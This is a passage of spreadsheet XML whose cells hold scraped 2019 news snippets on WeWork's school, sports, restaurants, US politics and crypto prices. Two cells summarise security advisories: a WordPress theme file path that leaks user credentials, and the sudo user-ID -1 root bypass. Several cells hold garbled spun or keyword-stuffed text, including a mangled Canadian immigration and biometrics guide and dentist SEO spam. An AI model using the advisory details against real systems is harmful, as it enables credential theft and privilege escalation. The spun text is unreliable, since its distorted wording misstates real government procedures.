so the elementary schooler worked with his mentor to create a podcast to interview a scientist from the nonprofit group Polar Bears International. Gupta’s son used WeWork’s recording studio to produce the podcast. The weekly trip to the farm further appealed to Gupta’s city family. “Working the soil and growing things and feeding them – it gives a sense of how life is created and how food is created,” he said, noting the lessons of patience and other skills his kids learned at the farm. We checked in with Gupta after learning the school would close. He said the WeGrow community of parents, teachers, and children still believed in the vision, and would “organize and create a winning solution for all stakeholders.” “Rebekah created a beautiful school where kids’ superpowers, happiness, love, spirituality and learning are the core,” he said. Bjarke Ingels-designed school WeWork spared little expense with WeGrow. Danish architect Bjarke Ingels’ firm BIG designed the New York school, and a former WeWork real estate employee told Business Insider that WeGrow was one of the few real estate projects Adam Neumann personally got involved with. According to Fast Company, the design would break down traditional classroom environments into “more tactile and visually stimulating” work stations. Multiple WeWork employees sent their children to the school, including at least one employee who was let go as part of the wave of cuts after the new CEOs took over. The Neumanns are not the only tech couple involved in educational efforts. Mark Zuckerberg and his wife Priscilla Chan run a private company that funnels the couple’s Facebook stock into programs that improve schools. They also own a school in Palo Alto. Got a tip? Contact this reporter via encrypted messaging app Signal at +1 (646) 768-1627 using a non-work phone, email at mmorris@businessinsider.com, or Twitter DM at @MeghanEMorris. (PR pitches by email only, please.) Join the conversation about this story » NOW WATCH: Violent video games are played all over the world, but mass shootings are a uniquely American problem Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/m1bVG1PIzQ8/wework-closes-wegrow-rebekah-neumanns-school-effort-2019-10 The post WeWork’s school is closing at the end of the academic year as the company ditches passion projects to stem its huge losses appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Marta Pascual Juanola</t>
  </si>
  <si>
    <t>A WA renter moved into a rental home in Beeliar after responding to a home rental ad on Gumtree and paying a $2000 deposit through a money transfer service only to find out he had been scammed one day later.</t>
  </si>
  <si>
    <t>Canada was the better team in all areas against the United States. They didn’t approach the game like underdogs and fully deserved the 2-0 win. Source: Sports Business News</t>
  </si>
  <si>
    <t>The GOODS from Toptable Group Vancouver, BC | With the arrival of Fall, it’s time to take in a multitude of harvest menus to enjoy the season’s bounty of robust flavours featured on our Chefs’ delectable plates. Diners in the know will be sure to take in Whistler’s trio of Toptable Group’s restaurants’ Fall prix fixe dinners, Sundays through Thursdays. Executive Chef James Walt brings back his eponymous four-course tasting menu at Il Caminetto for $39 per person, exclusive of tax and gratuity. Savour modern Italian dishes that sing with flavour from cicchetti to dolci. Araxi Restaurant + Oyster Bar’s 38th Anniversary Dinner is not to be outdone with Executive Chef James Walt’s $38 five-course regionally-inspired menu, exclusive of tax and gratuity (beginning September 29th). Tastes from nearby farms and waters are showcased throughout the menu and celebrate all things deliciously seasonal. For a Spanish take on the mountain, Bar Oso’s Chef Jorge Munoz Santos delivers falltime specialties that just taste like home. His weekday lunchtime Bocadillo special for $8 is a knock-out that can include a choice of housemade sangria or a craft beer for $12, exclusive of tax and gratuity (beginning September 30th). For the dinner hour, Chef Jorge’s $25 three-course anniversary menu is truly a taste of Spain with daily specials like Charcuterie, Gambas al Ajillo, and Roasted Eggplant with Chickpeas. Catch these Oso good offers Sundays through Thursdays. Back in the city, West Restaurant + Bar heralds crisp Autumn days with Executive Chef Bobby Milheron’s Fall prix fixe menus. For $29 per person, a two-course weekday lunch is offered and for $39 per person, a three-course dinner is available Sundays through Thursdays (exclusive of tax and gratuity). Perfect for a date night or a pre-theatre nosh! As the 2019 winner of the BC Seafood Festival Chef Challenge, be assured that Chef Bobby’s plates pick the best of the season for a taste of Fall. Join us soon and often for spectacular food and wine tastings – in Vancouver and Whistler! Araxi Whistler 110 - 4222 Village Square MAP Il Caminetto Sea-to-Sky 4242 Village Stroll, Whistler, BC MAP Bar Oso Sea-to-Sky 150 – 4222 Village Square MAP West Restaurant South Granville 2881 Granville St. MAP CinCin Ristorante + Bar West End 1154 Robson St. MAP Blue Water Cafe + Raw Bar Downtown 1095 Hamilton St. MAP Elisa Downtown 1109 Hamilton St. MAP</t>
  </si>
  <si>
    <t>And he wonders why he’s at 1%? .@BetoORourke: Yes, I’ll revoke tax exempt status for mosques and historically-black colleges, too pic.twitter.com/xYlf4zciue — Tom Elliott (@tomselliott) October 14, 2019</t>
  </si>
  <si>
    <t>The best of what's on in art, music, theatre, exhibitions, festivals, markets and more.</t>
  </si>
  <si>
    <t>Thai French Dictionary – travel dictionary to translate Thai to French. Click on the list to show Thai or French synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Thai French Dictionary →</t>
  </si>
  <si>
    <t>Developers are seeking to raise height limits to house Sydney's burgeoning population and make windfall profits.</t>
  </si>
  <si>
    <t>Was Geoffrey Tozer Australia's greatest classical pianist? And why have so few people heard of him?</t>
  </si>
  <si>
    <t>Atherton today</t>
  </si>
  <si>
    <t>Despite the controversial, massively unpopular finish to Sunday’s Hell in a Cell pay-per-view, which saw Seth Rollins and “The Fiend” Bray Wyatt’s main-event match for the Universal Championship end due to referee stoppage, Wyatt was conspicuously absent the night after on Monday Night Raw. As noted by Cageside Seats, WWE ran a video recap of the brutal match, but neither participant appeared on air to cut a promo or do anything else to keep the rivalry going. Click here to continue and read more… The Inquisitr</t>
  </si>
  <si>
    <t>Not only is the property downturn hitting household consumption, it's also a big drag on economic growth and likely to last for another year, the RBA's deputy governor warns.</t>
  </si>
  <si>
    <t>Hello Everyone, around the globe. Today we are bringing you to the Asian Travel and Tourism Fair 2019 at Bashundhara International Convention Center. Hope you’ll enjoy the Vlog. See you soon. Till then, Cheers !!! ——————————————————————————————————– Subscribe to my Channel: ———————————————————————————————————– Our Previous Videos: Changi Airport Singapore Ibis Styles Macpherson Singapore Singapore Flyer Marina Bay […] The post Travel Tuber || ICCB Asian Travel and Tourism Fair 2019 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>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Portsmouth set date for rearranged reserve clash against AFC Bournemouth Posted By: PL News October 9, 2019 Published: 18:06 Wednesday 09 October 2019 Pompey have set a date for their reserve fixture against AFC Bournemouth. The Blues were due to meet the Cherries in Central League Cup last week at Baffins Milton Rovers’ PMC Stadium. However, the heavy rain caused the clash to be postponed. Now the game has been rearranged for Tuesday, October 15 (1pm kick-off) and will be take place at Bognor’s Nyewood Lane. Either first-team coach Jake Wigley or academy boss Mark Kelly will be in charge of the side. Luke McGee could line-up in between the posts for Pompey, while youngsters such as Leon Maloney, Bradley Lethbridge and Joe Hancott are likely to feature. window.fbAsyncInit = function() FB.init( appId : ‘1690604690981724’, xfbml : true, version : ‘v2.9’ ); FB.AppEvents.logPageView(); ; (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_UK/sdk.js”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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The post Portsmouth set date for rearranged reserve clash against AFC Bournemouth appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>A site plan approval is a required process that you must follow for most developments including major building renovations or additions. The purpose of a site plan approval is to review site design features and coordinate the following: Cosmetic Dentist Near Halton Hills Ontario The Best 10 Dentists near Georgetown, Halton Hills, ON Showing 1-10 of 298 Halton Hills Georgetown Health &amp; Medical Dentists. More Dentists in Halton Hills Cosmetic Dentists Endodontists General Dentistry Oral Surgeons Orthodontists. Preferred Dentist In Halton Hills Ontario Number 1 Dental Clinic Near Halton Hills Best Dentist in Halton Hills RSS Friendliest Dentist In Cosmetic Dental Clinic Near Halton Hills Ontario 为您提供与 Oakville 相关的域名和网站信息，帮助您从域名应用的角度更好的了解域名是如何被使用的，为您使用域名提供参考依据。 Top Dentist In Halton Hills Top cities in United States Washington, D.C. Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated. . 2016-06-19 · FULL LIST OF ALL THE HOMICIDES (MURDERS AND MANSLAUGHTERS) BETWEEN 2000 and 2009 INCLUDING SALLY ANNE BOWMAN (PICTURED) WHO WAS KILLED BY MARK DIXIE IN 2005. 2009 Dec 2009 Dec 31 – Shele Danishefsky Covlin, 47, finance executive and mother, was drowned in a bathtub at her home on the Upper West Side, Manhattan, New. Weekend Briefing: First Friday in Flagler Beach, Cycling for Health, Country Fest at Fairgrounds, Inside the CRT Studio – There were buttresses of out-flying spurs, and round green hills were put. The Flagler Free Clinic was established in 2005. Most Popular Dental Clinic In Halton Hills Preferred Dentist In Halton Hills Ontario Number 1 Dental Clinic Near Halton Hills Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated. Best Dentist in Halton Hills Top Dental Clinic In Halton Hills The Best Dentists in Halton Hills Handpicked Top 3 Dentists in Halton Hills, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, Don’t for get; we don’t make these up. Please send your promotions, appointments, retirements and other transitions to transitions@longwoods.com Alphabetical listing of Committees, Sub-Committees, Agencies, Boards and Tribunals Not all committees have a direct report to City Council. Review the Committee Mandate information to see who they report to.</t>
  </si>
  <si>
    <t>The ThemeMakers Car Dealer / Auto Dealer Responsive theme through 2015-05-15 for WordPress allows remote attackers to obtain sensitive information (such as user_login, user_pass, and user_email values) via a direct request for the wp-content/uploads/tmm_db_migrate/wp_users.dat URI. Published at: October 11, 2019 at 07:15PM View on NVD website The post New vulnerability on the NVD: CVE-2015-9482 (car_dealer_/_auto_dealer_responsive) appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Destiny 2 had a big week with the launch of Shadowkeep and its free debut, and all the hype attracted many new players as well as new players. It is not surprising to see the number of Destiny 2 players reach new heights thanks to its newly removed entry price, but the launch has shifted the platform's hierarchy, and PC is now the platform the most powerful of the game. Steam players currently account for 41% of the Destiny 2 pie, according to data from the tracker built by the community, Charlemagne. PlayStation 4 comes in second with 34% of players and Xbox One in third with 25%. An archived version of the same page from July shows the PC version (then on Battle.net) with 22% of players, against 32% on X1 and 46% on PS4. Clearly, the jump to Steam has paid off. The Charlemagne bot on Discord indicates more specific player accounts. On October 8, Destiny 2 had 2.38 million players in all. 743k were on PS4, 600k on Xbox One and, although this bot is still blocked by old Battle.net data, there are more than one million daily players on Steam. (The bot also follows a different time from the website, so the percentages are slightly different.) Since its launch last week, Destiny 2 has been behind the big three of Steam: CSGO, Dota 2 and PUBG, and has by far surpassed all other regulars in the top 10. this company on the Valve platform – even rarer than a company stays there. In the meantime, Bungie's is preparing the future of Destiny. A strange update of Tower seems to indicate that more important changes will soon be operating in the hub, and it seems that we can continue to wait for these little narrative narratives in the future. INFO Buy now</t>
  </si>
  <si>
    <t>The women claim Franco offered up roles in independent films he was producing or directing for daring to bare all and appear in sex scenes. See full article at Film-news.co.uk » The post James Franco to seek damages from students claiming he sexually exploited them appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Children would now turn to go-karting, junior motorbike racing and junior speedway, which had a minimum competing age of five, Mr Board said.</t>
  </si>
  <si>
    <t>Almost 250 donated artworks from across the country will be sold this weekend and $77,000 was raised last year for Rural Aid.</t>
  </si>
  <si>
    <t>London is the cocaine capital of Europe after new tests revealed people in the capital are taking an average of 23kg of the A drug every day. More than half a million doses of cocaine, with an estimated street value of £2.75m, are being consumed in London on average each day - twice the amount of any other European city, according to a study seen exclusively by Sky News. Image: Getty</t>
  </si>
  <si>
    <t>Australian Jewish News' Rebecca Davis says, "Antisemitism is a widespread problem and it goes well beyond Melbourne schools." A five-year-old boy began wetting himself in bed, in school and in class after he was subject to antisemitic bullying at Hawthorn West Primary School in Melbourne. Ms Davis said, antisemitism "is a societal issue" that has seen "a 60 per cent increase in figures released by the Executive Council of Australian Jewry last year." His parents believed he was wetting himself due to his transition into kindergarten until the child broke down and told his mother she shouldn't love him because he was 'a Jewish rodent and vermin, a cockroach and a dirty Jew'. His parents discovered he had been bullied by five students in the school bathrooms which led to his acute state of anxiety. In a separate incident at another Melbourne school, a 12-year-old boy was beaten, assaulted and forced to kiss the feet of a Muslim boy because he was Jewish. A photograph of the bullying was made public with the permission of the boys' mother who wanted the issue raised after the Victorian Dept of Education didn't take action. "What is surprising in these cases is certainly the nastiness surrounding these attacks and the age group," Ms Davis said. Treasurer Josh Frydenberg called the acts "completely unacceptable".</t>
  </si>
  <si>
    <t>Sponsoring your partner, partner or reliant youngster Get ready to utilize The Basic Guide (IMM 5525) has information that is important: eligibility costs just how to use steer clear of mistakes that are common You will adopt in Canada, use the application kit to sponsor adopted children and other relatives instead if you are sponsoring your adopted child or a child. Get the list, types and guidelines At the time of 14, 2018, we’ve improved this application package based on your feedback february. Revised guides and checklists are available these days below. Learn more about what we’ve changed. Application gu &gt; Nation requirements that are specific – extra kinds for res &gt; вЂ“ Instruction(s) for papers вЂ“ Instruction(s) for papers вЂ“ s that are instruction( for papers вЂ“ Instruction(s) for documents You’ll want to offer your biometrics More often than not, at this point you have to provide your fingerprints and picture (biometrics) once you apply. Biometrics together with application procedure We make reference to your fingerprints and picture as biometrics. We gather biometrics for the majority of applications. Uncover what occurs from the time you distribute the job to whenever you have to Canada and where biometrics ties in the procedure. 1. Make an application for permanent residence If you wish to submit an application for permanent residence in Canada, ensure youвЂre entitled to apply. Utilize our application guides to help to fill away the application correctly, then submit the job. Prevent processing delays by sending us a whole application. 2. Get the fingerprints and picture taken You need to give your fingerprints and photo (biometrics) for every application for permanent residence you submit if youвЂre between 14 and 79 years old. Even although you provided your biometrics into the past and theyвЂre nevertheless valid. The biometrics must be paid by you feewhen you submit the application. Otherwise you may experience delays. Fully grasp this done because quickly as you can get the page from us that tells you to definitely offer biometrics. You have got 1 month to work on this through the date from the page. 3. We plan the application We start processing your application after we get your biometrics. Observe how long it requires to process the application. When we require more details away from you, weвЂll contact you. 4. We come to a decision on the job We let you know if youвЂre approved to come to Canada when we finish reviewing your application. We issue your documents if you are. When your application is refused, we deliver you a page that tells you why. 5. You visit Canada (if youвЂre approved) Ensure you travel using the papers you were given by us. This can include papers such as your verification of Permanent Residence (COPR), permanent resident visa (from a visa-exempt country or your single entry journey document if you donвЂt have a travel document if youвЂre from a country that needs a visa), or eTA (electronically linked to your passport) if youвЂre. Airline border and staff solution officers at ports of entry will ask to see your travel papers. In the event that you donвЂt ask them to, may very well not have the ability to board your journey to Canada. Make certain kiddies under 18 travel aided by the right papers. 6. We look at your identification once you get to Canada Whenever you arrive, we look at your identification to ensure that you may be similar individual who ended up being authorized to go to Canada. We might make use of your biometrics to get this done. When we canвЂt validate your identification, you are detained by way of a edge solutions officer. These officers help protect the ongoing safe practices of Canadians. If the officer determines you wonвЂt be allowed to enter Canada that youвЂre not admissible to Canada. In the event that you arrived by atmosphere, youвЂll have actually to have a return trip to for which you arrived from. 7. YouвЂre allowed to enter Canada If you pass the identification check and meet with the entry demands, the edge services officer stamps your passport and sexactly hows you just how long it is possible to stay static in Canada. YouвЂre normally permitted to stay static in Canada for as much as 6 months. Kiddies under 18 must meet with the entry that is same as grownups. The edge solutions officer may ask children that are minor show other papers according to if the youngster is travelling alone or with some body. Fundamental entry demands You need to satisfy some fundamental needs to enter Canada. You need to: have valid travel document, just like a passport maintain a healthy body do not have unlawful or convictions that are immigration-related convince an immigration officer you back to your home country that you have tiesвЂ”such as a job, home, financial assets or familyвЂ”that will take convince an immigration officer that you’ll leave Canada during the end of one’s check out can afford to your stay The money you shall require relies on just how long you will definitely remain and in case you can expect to remain in a resort, or with buddies or loved ones. Some individuals aren’t admissible to Canada, which means that they’re not allowed to enter the nation. You will be inadmissible for many reasons, including being taking part in: unlawful task individual liberties violations arranged criminal activity You can even be inadmissible for safety, wellness or economic reasons. Biometrics charge Individual applicant: CAD $85 Families applying in the time that is same maximum total cost of CAD $170 Sets of 3 or even more performing artists and their employees whom submit an application for work allows during the exact same time: maximum total cost of $CAD 255 Help вЂ“ Choosing the nation the individual being sponsored resides in This is basically the national nation the individual happens to be located in. It might be distinctive from the nation or nations they’ve been residents of. In the event that individual being sponsored life in Canada, choose Canada. Help вЂ“ Submit your write-ups Relate to your list to get out which papers you’ll want to submit. Pick the nation you get these papers from. In the event that you will submit papers from a few countries that are different choose “Add another nation.” In the event that you will require papers from significantly more than mail order brides biz three nations, please begin the device once more. Spend your charges online Submit the job Learn how to review, come up with and mail your finished application. In June 2018, we changed our mailing details. Based on your circumstances, you shall need certainly to deliver the application to the workplace in Mississauga or in Sydney. In the event that you deliver the job into the incorrect address, it’s going to be delivered back for you. Learn which target is right for you personally into the instruction guide. Get updates regarding the application online You are sponsoring meet the eligibility requirements, we will mail or email you a request to link your application to an online account if you and the person. Having problems? Begin to see the questions that are top connecting the application within the Assistance Centre.</t>
  </si>
  <si>
    <t>Her candid comments prompted guest The Talk co-host Rumer Willis to also open up about her years as a victim of bullying. See full article at Film-news.co.uk » The post Bullies prompted Marie Osmond's son to kill himself appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Farah Nasser</t>
  </si>
  <si>
    <t>Here are some places offering 'pop-up' strike camps across the province in the event of a strike on Monday.</t>
  </si>
  <si>
    <t>Disclaimer: The opinion expressed here is not investment advice – it is provided for informational purposes only. It does not necessarily reflect the opinion of U.Today. Every investment and all trading involves risk, so you should always perform your own research prior to making decisions. We do not recommend investing money you cannot afford to lose. The cryptocurrency market has not shown significant changes over the weekend, the rates of the top coins have almost unchanged. However, the total market capitalization has declined and now makes up $216 Bln. Ethereum is showing a relatively more confident dynamics, with a favorable external background; it can be considered as one of the main coins in the portfolio amid a shortage of trading ideas in other assets. Name Ticker Market Cap Price Volume (24h) Change (24h) Ethereum ETH $19 041 254 651 $176,26 $5 986 339 065 -0,43% ETH/USD: Charts are Pointing at a Further Decline ETH/USD quotes remain below the resistance level. Moreover, the price pushed off from moving averages, indicating downward momentum. As a medium-term trading idea, one should expect a test of the broken border of the upward channel at the level of $193, then a continued decline and a test of the support area at $140. The values of the RSI indicator also support the ongoing decline. There is an assumption that the “Head and Shoulders” pattern is being formed on the indicator, in this case, a downward trend is about to be continued. On the 4H chart, the leading altcoin is moving within the descending channel. A downward model “Flag” is being formed, which indicates a potential continuation of the fall with the first target at $140. Confirmation of the decline will be a breakdown of the lower border of the “Flag” model with fixing quotes below the level of $150. Ethereum is trading at $173,82 at press time.</t>
  </si>
  <si>
    <t>German Urdu Dictionary – travel dictionary to translate German to Urdu. Click on the list to show German or Urdu synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading German Urdu Dictionary →</t>
  </si>
  <si>
    <t>3:13 AM ET LOS ANGELES — Golden State Warriors forward Draymond Green believes that poorly run organizations don’t get nearly enough blame when top draft picks don’t pan out. Green, who has developed into one of the league’s most respected players after being selected in the second round of the 2012 draft by the Warriors, went on a passionate defense Wednesday night of Marquese Chriss when the topic of his NBA viability was brought up. Chriss has bounced around the league since being the eighth pick in the 2016 draft. “Yeah, I don’t think there was ever a doubt that he was a legitimate NBA player,” Green said after the Warriors’ 126-93 preseason loss to the Los Angeles Lakers. “I think everyone was just kind of waiting on him to turn that corner. He seems like he’s turning the corner. I think he’s been in some pretty tough situations.</t>
  </si>
  <si>
    <t>Macmillian Organization is offering weekly compensation for participants who will work with us to support our cancer awareness campaign program by placing our decal car stickers on their car or bike. Only a few will be selected. If you are interested, please feel free to email me with a brief description on why you may .. Read more</t>
  </si>
  <si>
    <t>October 4, 2019. Australian UFC stalwart Jake Matthews at the UFC media day in Melbourne speaks about his last fight and the lessons he has taken out of it. "I always said it's a marathon, it's not a sprint," Matthews says. "I want to make sure... I am mature in the sport. I want to make a run for the top ten, top five one day and possibly a title." Matthews goes on to talk about the advantages that come with fighting at home in Melbourne. "I can keep the same schedule which is really good for me," Matthews says. (AAP Video/Adrian Warren)</t>
  </si>
  <si>
    <t>Residents return to fire-ravaged towns, former NSW Labor boss fronts ICAC, and Labor divided on climate targets. Image: News Corp Australia</t>
  </si>
  <si>
    <t>Craig Mathieson</t>
  </si>
  <si>
    <t>Can a single creator make a difference to a streaming service? In the case of Murphy, Netflix obviously believes so.</t>
  </si>
  <si>
    <t>Twenty months ago, David De Gea was beaten by Matt Ritchie. Martin Dubravka making his NUFC debut and Ritchie scoring the only goal of the game as Newcastle beat Man...Twenty months ago, David De Gea was beaten by Matt Ritchie. Martin Dubravka making his NUFC debut and Ritchie scoring the only goal of the game as Newcastle beat Man... You can click here to read the full article. The post David De Gea brutal honesty after asked what Manchester United need to improve after Newcastle defeat appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>technologyBlockchain is a buzzword today, but what does it really mean? On Oct. 2019, K•Coe Isom is hosting “Assessing the Value of Blockchain in Manufacturing: A Hard Look at Hazards vs. Benefits” a webinar that is designed to answer this question. The webinar will take a closer look at how blockchain is relevant today for manufacturers, the benefits that can be obtained, the hazards to be aware of, and overall, the value proposition of implementing it. Registration for the webinar is now open. Brian Sparks is senior editor of Greenhouse Grower and editor of Greenhouse Grower Technology. See all author stories here.</t>
  </si>
  <si>
    <t>Both terms have actually a rather comparable goal. They look for to offer the most effective experience that is possible a solitary web site when it is viewed on a large number of desktop, mobile, tablet devices. Ethan Marcote is commonly cited as coining the word Responsive Design which will be the utilization news inquiries to provide various CSS enabling a niche site to change it out appearance that is’s seen on various size displays. Therefore in a nutshell it could be achieved with only simple HTML &amp; CSS. (today it is often HTML5/CSS3, nonetheless it’s not necessary) Adaptive Design may be the name regarding the guide by Aaron Gustafson so I’m guessing he’s recognized as on an expert of term. He sites adaptive design as like the CSS news questions of Responsive Design, but additionally incorporating Javascript based improvements to alter the site’s HTML markup based from the abilities regarding the unit. It is also called “Progressive Enhancement” A good example is you may have a side club navigation from the desktop size form of the website, after which whenever seen for a smartphone the menu turns into a choose list to conserve area into the software. Another example is you may offer functionally on smart phone unavailable on a desktop. State you’d a restaurant that is website it’s seen for a mobile device that’s location conscious with GPS, a panel seems saying “Get directions to the restaurant from your own location”. Desktops don’t understand their location so it does not seem to them. Responsive Website Design (RWD) The main element elements that comprise a Responsive site are CSS3, media inquiries, the @media guideline, and fluid grids that use percentages to generate a versatile foundation. It’s also fundamental to make use of images that are versatile flexible videos, fluid type and EM’s as opposed to pixels. Each one of these tips enable the responsive web site to change its design to accommodate these devices. Responsive design is client-side this means the web page is provided for the unit web web browser (the customer), in addition to web browser then modifies the appearance of the web web page with regards to how big the web web browser screen. The meaning of the responsive web site is it’ll fluidly change its structure to boost the accessibility of content with respect to the display screen measurements associated with the web web web browser screen. Adaptive Website Design (AWD) Adaptive website design utilizes predefined designs which were very very carefully built for a number of display screen sizes. a layout that is particular triggered as soon as the display size of the product viewing the internet site is detected and matched with a mode sheet. Adaptive design is predominantly server side. Which means that the net host does all the work of detecting the different products and loading the style that is correct according to the characteristics regarding the unit. Plus the design changing with regards to the measurements of this display they are able to also change according to conditions like whether or not the unit has a retina display or perhaps not. The server can identify this and show quality pictures for retina display products like iPads and reduced quality pictures for standard-definition displays.The downsides to AWD are that initial construction is quite high priced while you have complete large amount of designs to develop. And also to keep and upgrade many of these designs can be extremely time intensive which will consequently be expensive of income. This is of an adaptive web site is the one that has a couple of predefined designs which can be triggered whenever most suitable into the unit detected by the host. Similarities and differences Well-known similarity of both techniques would be that they improve accessibility of site content on mobile phones and screen that is various. They additionally both offer visitors with an advanced mobile-friendly consumer experience. They have been various in how which they deliver the responsive / adaptive design into the individual. RWD depends on fluid grids and AWD is depending on predefined size layouts. Additionally the actual fact they differ that they either use client side or server side is another way in which. The benefits of Responsive Design: 1. User-friendly and versatile on different display resolutions. 2. Unified artistic and experience that is operational multi-terminal, with low priced allocated to maintenance. 3. Search Engine Optimization friendly and there is no web page version difference, keeping the Search Engine Optimization strategy consistent. 4. The bond between mobile and desktop sites could be finished without redirection. The benefits of Adaptive Design: 1. Suitable despite having some complicated site. 2. It may be implemented at a lower life expectancy cost. 3. Coding will undoubtedly be much time-efficient. 4. Testing is going to be much easier and procedure could be reasonably more accurate. Must I Make Use Of Adaptive or Responsive Design? Tallying within the score, responsive website design is virtually constantly drag and drop website builder the safer choice to choose for your web site. It constantly functions well whatever screen that is new come and get, improves loading times, and it is frequently definitely worth the extra work in placing it together. Nevertheless, for many internet web sites, adaptive might be an improved option. These would probably be more recent, smaller internet sites being simply beginning down and need certainly to protect their resources. a site that is adaptive better to produce, while the smaller size and market would maintain the slow load times or reduced freedom from being a problem. Fast methods for developers: Invite your designers in to the conversation as soon as feasible. Discuss coding restrictions and align your visions for the task. Determine the differences and similarities between web web web page elements and develop typical habits for page templates. This process could save some time offer a constant feel to the website. When designing adaptive, design for these six typical screen w &gt; I really hope this short article assisted one to clear the cutter making you clear when you should make use of one and exactly how to cope with it. If thats the full case dont forget to share with you this and Clap…Clap… since this motivates me personally to publish on things like this which matters #Spreadknowledge</t>
  </si>
  <si>
    <t>Debian Linux Security Advisory 4543-1 – Joe Vennix discovered that sudo, a program designed to provide limited super user privileges to specific users, when configured to allow a user to run commands as an arbitrary user via the ALL keyword in a Runas specification, allows to run commands as root by specifying the user ID – -1 or 4294967295. This could allow a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access. Published at: October 15, 2019 at 02:53PM View on Packet Storm The post Debian Security Advisory 4543-1 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Free shipping if you spend more than $70. Cheapest online at moment is with OZSALE for $119. If you missed out on the sphero, then this may be a good alternative for your kids to code and build a robot. Specs: Enjoy learning about programming, electronics and robotics in a fun interactive way. Inspired by Scratch coding, mBot is an easy-to-assemble gadget with Bluetooth connectivity. Piece together the 38 pieces and use the colour-coded RJ25 ports to begin programming straight away. The mechanical body of the mBot is compatible with most Lego parts, while the electronic sections are based on the Arduino open-source ecosystem. The drag-and-drop software provides an intuitive way for kids to learn programming. Soon you'll be able to control the robot and see it carry out small tasks. Transform your mBot into an obstacle-avoidance car, line-following vehicle or remote control car. You can also use mBot to play multiple games like balloon bursting game, soccer playing, sumo and more.</t>
  </si>
  <si>
    <t>The Spectator</t>
  </si>
  <si>
    <t>Judges of experience Sir: In the midst of the furore about the Supreme Court judgment, many people are now questioning…</t>
  </si>
  <si>
    <t>There are plenty of reasons to watch the Oleksandr Gvozdyk vs. Artur Beterbiev light heavyweight title unification fight on Friday night. Source: Sports Business News</t>
  </si>
  <si>
    <t>A trailer has been released for upcoming 9GO! comedy shorts Metro Sexual. The series starring Geraldine Hickey and Riley Nottingham is set in a disaster-prone Metro Sexual Health Clinic. They are joined by a guest cast including Ryan Shelton, Joel Creasey, Clayton Jacobson, Jo Stanley, Toby Truslove, John Flaus, Candy Bowers, Brenda Palmer, David Paterson, Urvi Majumdar, Rebecca Massey and David Tulk. An airdate is yet to be announced. Filmed in a mockumentary format the 8 x 10 minute series will follow the lives of sardonic and seemingly-aloof Stephanie (Geraldine Hickey) and bubbly, customer service-driven Langdon (Riley Nottingham), as they navigate government cuts, crab outbreaks and schoolies seasons. It is no laughing matter that between 2013 and 2017, the notification rate of infectious syphilis increased 135% from 7.8 per 100,000 in 2013 to 18.3 per 100,000 in 2017, with an increase in both men (119%) and women (309%). Metro Sexual delivers laughs from some of Australia’s brightest comedic talents alongside informed conversations about sexual health. Metro Sexual is a Humdrum Comedy production for 9Go! and 9Now. Principal production investment from Screen Australia, in association with Film Victoria.</t>
  </si>
  <si>
    <t>The White House is preparing to formally object to Democrats’ impeachment inquiry as soon as Friday, saying it won’t co-operate with the probe because it was initiated without a vote of the House. The White House Counsel’s Office was preparing to send a letter to House Speaker Nancy Pelosi objecting to the form of the impeachment investigation, a person familiar with the matter said late Thursday, speaking on condition of anonymity to discuss the letter before its dissemination. Pelosi last week announced that the House was beginning the formal inquiry but didn’t seek the consent of the full chamber, as was done for impeachment investigations into former Presidents Richard Nixon and Bill Clinton. READ MORE: Joe Biden fires back at Donald Trump over repeated Ukraine accusations Rudy Giuliani, the president’s personal attorney, confirmed that the letter was forthcoming. Trump allies have suggested for days that without a formal vote, the House is merely conducting standard oversight, entitling lawmakers to a lesser level of disclosure from the administration. The Justice Department raised similar arguments last month, though that was before Pelosi announced the impeachment investigation. Story continues below advertisement In a letter Thursday to House Minority Leader Kevin McCarthy, Pelosi argued, “There is no requirement under the Constitution, under House Rules, or House precedent that the whole House vote before proceeding with an impeachment inquiry.” 3:09 Pompeo now admits to being on Trump-Zelensky phone call Pompeo now admits to being on Trump-Zelensky phone call There’s no clear-cut procedure in the Constitution for launching an impeachment inquiry, leaving many of these questions about obstruction untested in court, said Allan Lichtman, a history professor at American University. “There’s no specification in the Constitution in what does and does not constitute a more formal impeachment inquiry or investigation,” he said. “One can argue if they’re in an impeachment investigation, they’re in an impeachment.” Giuliani dismissed the entire premise of the impeachment inquiry, which is centred on Trump asking Ukraine to investigate his possible political rival, former Vice-President Joe Biden. READ MORE: After asking China to probe Bidens, Trump claims he has the right to seek other countries’ help “The president was not tasking Ukraine to investigate a political opponent,” Giuliani told The Associated Press on Thursday. “He wanted an investigation into a seriously conflicted former vice-president of the United States who damaged the reputation of the United States in Ukraine.” Democrats have sought to use their declared impeachment investigation to bolster their case to access all sorts of documents from the administration, most recently secret grand jury information that underpinned special counsel Robert Mueller’s report on Russian interference in the 2016 election. They have also threatened to use the administration’s refusal to turn over documents and make witnesses available to potentially form an article of impeachment over “obstruction” of the congressional inquiry. Story continues below advertisement 1:09 Pelosi says Congress will treat Trump ‘with fairness’ as impeachment inquiry moves ahead 